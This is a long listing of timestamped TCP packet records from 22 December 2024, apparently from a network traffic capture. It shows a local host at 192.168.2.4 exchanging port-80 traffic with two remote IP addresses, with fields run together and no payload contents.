                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.301980019 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.302046061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.302078962 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.302095890 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.302113056 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.302822113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.302872896 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.302920103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.302953959 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.302968979 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.303003073 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.303730965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.303791046 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.303833008 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.303867102 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.303884029 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.303905964 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.304647923 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.304698944 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.304698944 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.304737091 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.304738998 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.304781914 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.305493116 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.305541992 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.305612087 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.305645943 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.305658102 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.305689096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.309624910 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.309722900 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.309848070 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.309880972 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.309890032 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.309921980 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.309993029 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.310048103 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.310125113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.310158014 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.310170889 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.310199976 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.310997963 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.311059952 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:18.576239109 CET4975980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:18.576600075 CET4978580192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:18.699038029 CET8049759185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:18.699084044 CET8049785185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:18.699122906 CET4975980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:18.699243069 CET4978580192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:18.699363947 CET4978580192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:18.818932056 CET8049785185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.050513029 CET8049785185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.050714970 CET4978580192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.232331991 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.232342958 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.352005005 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.352094889 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.352312088 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.352385998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.352437019 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.472143888 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.680917025 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.680958986 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681019068 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681018114 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681051016 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681057930 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681097031 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681107998 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681149006 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681190968 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681245089 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681246042 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681282997 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681288004 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681349039 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681526899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681562901 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681575060 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681615114 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.800932884 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.800957918 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.801022053 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.805033922 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.805372000 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.805440903 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.873167038 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.873406887 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.873471022 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.877463102 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.877571106 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.877629042 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.885591984 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.885647058 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.885797977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.885797977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.894154072 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.894177914 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.894211054 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.894233942 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.902679920 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.902704000 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.902785063 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.911324024 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.911349058 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.911374092 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.911405087 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.919440031 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.919465065 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.919490099 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.919502974 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.927553892 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.927604914 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.927655935 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.927699089 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.936038971 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.936091900 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.936372042 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.936418056 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.944859028 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.944884062 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.944909096 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.944926977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.951872110 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.951917887 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.951920986 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.951957941 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.958468914 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.958496094 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.958523035 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.958544970 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.065713882 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.065735102 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.065771103 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.065792084 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.067890882 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.067934990 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.068789005 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.068829060 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.068875074 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.068914890 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.073550940 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.073600054 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.073643923 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.073688984 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.077264071 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.077325106 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.077430964 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.077476025 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.081967115 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.082026958 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.082161903 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.082210064 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.086692095 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.086738110 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.086879969 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.086920023 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.091372967 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.091417074 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.091694117 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.091738939 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.096071959 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.096096039 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.096127987 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.096138000 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.100605965 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.100632906 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.100657940 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.100672007 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.105081081 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.105107069 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.105144978 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.105357885 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.109668970 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.109695911 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.109730959 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.109743118 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.113828897 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.113888979 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.113903999 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.113979101 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.118491888 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.118516922 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.118539095 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.118560076 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.122869968 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.122895956 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.122931004 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.122944117 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.127223015 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.127326012 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.127355099 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.127409935 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.131874084 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.131900072 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.131927013 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.131943941 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.136168003 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.136194944 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.136348963 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.140609026 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.140680075 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.140698910 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.140769958 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.145091057 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.145139933 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.145164013 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.145201921 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.149585009 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.149631977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.149878979 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.149923086 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.154032946 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.154077053 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.154248953 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.154289961 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.158535957 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.158580065 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.158622026 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.158663988 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.163017988 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.163074017 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.163084984 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.163150072 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.187398911 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.187453032 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.187673092 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.258450985 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.258538961 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.258539915 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.258591890 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.260210991 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.260272980 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.260345936 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.260399103 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.263717890 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.263772011 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.263911009 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.263967991 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.267441034 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.267499924 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.267527103 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.267574072 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.270298004 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.270355940 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.270755053 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.270812035 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.274425983 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.274467945 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.274485111 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.274523020 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.277163982 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.277235031 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.277287006 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.277337074 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.280872107 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.280909061 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.280930042 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.280961990 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.284132004 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.284203053 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.284296989 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.284395933 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.287564993 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.287622929 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.287633896 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.287669897 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.290998936 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.291076899 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.291177988 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.291229963 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:22.294579029 CET804978731.41.244.11192.168.2.4
